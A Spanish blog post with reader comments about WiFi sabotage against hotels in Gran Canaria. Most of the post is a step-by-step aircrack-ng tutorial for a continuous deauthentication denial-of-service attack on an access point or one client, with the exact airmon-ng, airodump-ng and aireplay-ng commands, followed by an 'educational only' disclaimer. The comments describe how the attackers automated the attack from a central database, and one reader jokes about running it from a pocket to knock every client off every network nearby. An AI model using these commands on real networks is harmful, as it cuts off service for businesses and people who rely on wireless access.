sábado, 2 de noviembre de 2013

¿Cómo hicieron el boicot a las redes WIFI del sur de Gran Canaria?

Ayer me despertaba un amigo con una noticia que me hizo abrir los ojos bastante más rápido de lo normal, "El boicot a las redes WIFI de los hoteles cesa al realizarse las detenciones". No había escuchado nada sobre estos ataques así que rápidamente entré en el periódico digital y pude ver de que se trataba.
NOTICIA

Seguramente habrán pensado que se trata de un complejo ataque con una gran inversión...pero solo hace falta un portátil con una distribución linux, una tarjeta inalámbrica y ganas de fastidiar un poco.



Vamos a ver como se realizan este tipo de ataques, comúnmente llamados DOS (Denial of service), donde se inhabilita un servicio por diferentes razones, como en esta noticia, para que contrataran sus servicios.


Después de arrancar nuestra distribución linux e instalar la suite aicrack-ng, abrimos una terminal y seguimos los siguientes pasos:

Poner la tarjeta en modo monitor ->     Airmon-ng start wlan0          (Esto hará que podamos "escuchar" las redes inalámbricas, creando una interfaz virtual llamada mon0)

Comenzamos a escanear ->     Airodump-ng mon0
Después de unos minutos podremos ver las redes y clientes que tenemos a nuestro alcance, así que seleccionamos el que vamos a atacar y copiamos su dirección MAC del tipo 00:11:22:33:44:55.

Ataque DOS ->     Aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0
Esto realizará un ataque de desautenticación continuo a la MAC que hayamos puesto con la interfaz mon0.


Si quisieramos desautenticar solo un cliente, usariamos la sintaxis:
Aireplay-ng -0 0 -a 00:11:22:33:44:55  -c 00:11:22:33:44:55 mon0
Donde -c indica cliente con su correspondiente MAC.


Video del proceso


Recuerdo que el fin de estos tutoriales es puramente educacional y que, en ningún momento, se fomenta los ataques a redes o sistemas que no sean de nuestra propiedad.

Un salu2!!

3 comentarios:

  1. Muy buen tutorial. Resumido pero muy bueno. Enhorabuena

    Ellos lo que hacian era esto mismo pero metido en una antena con software openwrt que se conectaba con su base de datos central, donde indicaban en cada momento a que atacar. Dicha información la optenian con un simple site-survey que tambien guardaban en base de datos.
    De esta forma cada dia veian si habia nuevas antenas/usuarios/hoteles y añadian las que querian atacar.

    Algunos operadores cambiaban ssid/mac asi durante un dia no eran atacados, pero ellos captaban eso al dia siguiente, o ese mismo dia a ultima hora, y lo incluian

    Una organización impecable.


    ResponderEliminar
  2. La verdad es que se lo tenían bastante estudiado aunque todavía me quedan dudas si querían dejar esto un tiempo determinado o indefinido...
    Si fuese la segunda opción...de estudiado pasa a chapuza porque con un poco de empeño se saca fácilmente.

    Gracias por tu comentario.

    Un salu2!!

    ResponderEliminar
    Respuestas
    1. Chapuza? Pues creo que la organización y el ataque es impecable.. Lo que realmente causa intriga es ver los pasos que se han tomado para la localización de la fuente del ataque.
      Puedo estar en casa haciendo un ataque 0 de desautentificación sin que nadie se pispe y sin posiblemente ser localizado.. El problema de esto es que los propios atacantes eran proveedores de servicio y atacaban a los clientes hoteleros de la competencia con la intención de que les contrataran los servicios, servicios que hacía "magicamente" que las conexiones Wifi's funcionaran..
      Si no hubiese sido por eso que logicamente levanta una sospecha de la hostia, dudo que hayan podido localizar el foco.. y a dia de hoy aún seguirían trabajando para poder mitigar el ataque..
      Por cierto, también es posible hacerlo desde dispositivos moviles donde se pueda poner la tarjeta en modo monitor, y además es bien sencillo hacer un script que vaya tirando a TODOS los clientes de TODAS las MAC que pille.. Por lo que ir con el ataque activo desde el bolsillo por una zona centrica puede ser muy divertido :D

      Eliminar